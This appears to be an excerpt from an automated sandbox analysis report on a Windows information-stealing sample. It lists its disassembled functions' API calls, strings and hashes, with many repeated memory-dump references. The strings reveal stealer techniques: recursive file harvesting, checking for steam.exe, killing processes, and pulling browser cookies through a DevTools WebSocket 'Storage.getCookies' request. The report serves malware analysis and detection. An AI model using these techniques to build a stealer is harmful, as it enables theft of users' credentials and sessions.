                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: ddd89c2cb480ec4342f1302ec8af5785d919c6a9a6a407015bbdb409bb168d99
                          • Instruction ID: e42adf18886de6525ee02cdbe1376e80303fcc9b8543d26640ef34c128893645
                          • Opcode Fuzzy Hash: ddd89c2cb480ec4342f1302ec8af5785d919c6a9a6a407015bbdb409bb168d99
                          • Instruction Fuzzy Hash: D8819F3491060B9BEB21EFA8D889AEF7FB5BF41700F044165FA05A7251DB349CD1CB95
                          Function 0052DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0052DD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0052DD4C
                          • wsprintfA.USER32 ref: 0052DD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 0052DD79
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052DD9C
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0052DDB6
                          • wsprintfA.USER32 ref: 0052DDD4
                          • DeleteFileA.KERNEL32(?), ref: 0052DE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0052DDED
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                            • Part of subcall function 0052D980: memset.MSVCRT ref: 0052D9A1
                            • Part of subcall function 0052D980: memset.MSVCRT ref: 0052D9B3
                            • Part of subcall function 0052D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052D9DB
                            • Part of subcall function 0052D980: lstrcpy.KERNEL32(00000000,?), ref: 0052DA0E
                            • Part of subcall function 0052D980: lstrcat.KERNEL32(?,00000000), ref: 0052DA1C
                            • Part of subcall function 0052D980: lstrcat.KERNEL32(?,011ADF18), ref: 0052DA36
                            • Part of subcall function 0052D980: lstrcat.KERNEL32(?,?), ref: 0052DA4A
                            • Part of subcall function 0052D980: lstrcat.KERNEL32(?,011ACFC8), ref: 0052DA5E
                            • Part of subcall function 0052D980: lstrcpy.KERNEL32(00000000,?), ref: 0052DA8E
                            • Part of subcall function 0052D980: GetFileAttributesA.KERNEL32(00000000), ref: 0052DA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052DE2E
                          • FindClose.KERNEL32(00000000), ref: 0052DE3D
                          • lstrcat.KERNEL32(?,011AE4B8), ref: 0052DE66
                          • lstrcat.KERNEL32(?,011AD2A8), ref: 0052DE7A
                          • lstrlen.KERNEL32(?), ref: 0052DE84
                          • lstrlen.KERNEL32(?), ref: 0052DE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052DED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: 813797e06265b61f68567ede44173a6592b7988cd538d59791f6f1f3f1fa7c9f
                          • Instruction ID: 0b2e3a0d355e0d835e40522c3976df1fbba2529566a529d02d451b48c9f5f379
                          • Opcode Fuzzy Hash: 813797e06265b61f68567ede44173a6592b7988cd538d59791f6f1f3f1fa7c9f
                          • Instruction Fuzzy Hash: DC619575910219ABCB10EF74DC89AEE7BB9BF89300F008599F505D7291EB34AE94CF54
                          Function 0052D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0052D54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 0052D564
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052D584
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0052D59E
                          • lstrcat.KERNEL32(?,011AE4B8), ref: 0052D5E3
                          • lstrcat.KERNEL32(?,011AE518), ref: 0052D5F7
                          • lstrcat.KERNEL32(?,?), ref: 0052D60B
                          • lstrcat.KERNEL32(?,?), ref: 0052D61C
                          • lstrcat.KERNEL32(?,00541794), ref: 0052D62E
                          • lstrcat.KERNEL32(?,?), ref: 0052D642
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052D682
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052D6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052D737
                          • FindClose.KERNEL32(00000000), ref: 0052D746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 061b7bd9521fabb6ac8039f577b70d03aa969fcb84e452dc0bf8b1e543c24eda
                          • Instruction ID: 14df92bdb6a34c3e64234f320a2fafbee9eeef82dce86836e726a766db53b65f
                          • Opcode Fuzzy Hash: 061b7bd9521fabb6ac8039f577b70d03aa969fcb84e452dc0bf8b1e543c24eda
                          • Instruction Fuzzy Hash: 0A61767591011A9BDB20EF74DC88ADE7BB9FF89300F0085A5E64993251DB38AA94CF90
                          Function 005348B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: cd959ca846d71e47cc8f5f38d4ce7b6f34242c68e66d6ccedb64e260295812d7
                          • Instruction ID: cbec1f47aa91896c2e9b90e6d9df6e44de50d1d4e6c9b4283b1b896f2c03b265
                          • Opcode Fuzzy Hash: cd959ca846d71e47cc8f5f38d4ce7b6f34242c68e66d6ccedb64e260295812d7
                          • Instruction Fuzzy Hash: CAA25971D012699FDB20CFA8C8807EDBBB6BF89300F1485AAD518A7241EB755E85CF91
                          Function 005223A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005223D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005223F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00522402
                          • lstrlen.KERNEL32(\*.*), ref: 0052240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00522436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00522486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: c7152a906c6b6c28977d65c7e83e7414ba037e40ee8855371c48bcaef62eab38
                          • Instruction ID: eacc5960e6691b24d1934a64ceec2e5c354af099600eb575a8b32c81f8b67e33
                          • Opcode Fuzzy Hash: c7152a906c6b6c28977d65c7e83e7414ba037e40ee8855371c48bcaef62eab38
                          • Instruction Fuzzy Hash: D8419E3455021A9BEB32FF68EC89ADE7FA5BF92300F005124F94A97251CB749DD18F90
                          Function 008CA61B Relevance: 14.2, Strings: 10, Instructions: 1657COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "*w$$u;$7HwO$IiO$[|?n$]kW^$c{$js}$x;_$u}
                          • API String ID: 0-3523132699
                          • Opcode ID: eaa862e35faaa9a79073326625cec62ef80ce9d5c76fa52c3ac66c95ea931cc2
                          • Instruction ID: e1d950b8dfb831c0c2b4f925b74e1a2865141a6d3208ecaca9eda52052a9a466
                          • Opcode Fuzzy Hash: eaa862e35faaa9a79073326625cec62ef80ce9d5c76fa52c3ac66c95ea931cc2
                          • Instruction Fuzzy Hash: 87B202F360C6049FD3086E2DEC8567AFBE9EF94620F1A493DEAC4C7744EA3558018696
                          Function 005346A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 005346B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 005346C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 005346DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 005346ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00534702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00534711
                          • CloseHandle.KERNEL32(00000000), ref: 00534718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00534726
                          • CloseHandle.KERNEL32(00000000), ref: 00534731
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 474e2892090309d5820858341a65460cd09ef0eac9c45195cf4ea570e9603728
                          • Instruction ID: 4da82905f7d071c52e4aafd5184ddc9c540d9d0e4d004713124fb6d991eb2e69
                          • Opcode Fuzzy Hash: 474e2892090309d5820858341a65460cd09ef0eac9c45195cf4ea570e9603728
                          • Instruction Fuzzy Hash: AA01A1355011156BE7205B609C89FFF3B7CEB46B01F04418AFA0592090EF78A9858A69
                          Function 008C8B53 Relevance: 12.9, Strings: 9, Instructions: 1614COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %:~$&nk$4g}$Hwu$T2y2$fdmQ$mk$mz$vH
                          • API String ID: 0-3812669263
                          • Opcode ID: 6c8bc74ee3d706773b2a7a36bfb0beecf9ea7d66e25c07958e277ce0d52b3fba
                          • Instruction ID: 58f17cb2f6779baf9126f3dbe7bf0a3c06ac3a8179af49417600678f5fecf488
                          • Opcode Fuzzy Hash: 6c8bc74ee3d706773b2a7a36bfb0beecf9ea7d66e25c07958e277ce0d52b3fba
                          • Instruction Fuzzy Hash: C2B2D5F360C2049FE704AE29EC8567ABBE5EF94320F16893DE6C4C7744EA3598418797
                          Function 00534610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00534628
                          • Process32First.KERNEL32(00000000,00000128), ref: 00534638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0053464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00534660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00534672
                          • CloseHandle.KERNEL32(00000000), ref: 0053467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: 63bd55527a6ce7510dce265fcc44aadc2084a3355a871a705bb617002a88a0eb
                          • Instruction ID: c908304f876f12225a7b55b9f194e61fad1d932bdbaa5ae5d1989b8616f16306
                          • Opcode Fuzzy Hash: 63bd55527a6ce7510dce265fcc44aadc2084a3355a871a705bb617002a88a0eb
                          • Instruction Fuzzy Hash: 190162756011299BD7209F60AC49FEB7BBCEF0A750F0441D6EA08D1050EF78D9948FE9
                          Function 00524B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00524B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524B7F
                          • lstrlen.KERNEL32(00544CA8), ref: 00524B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524BA7
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 00524BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00524BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
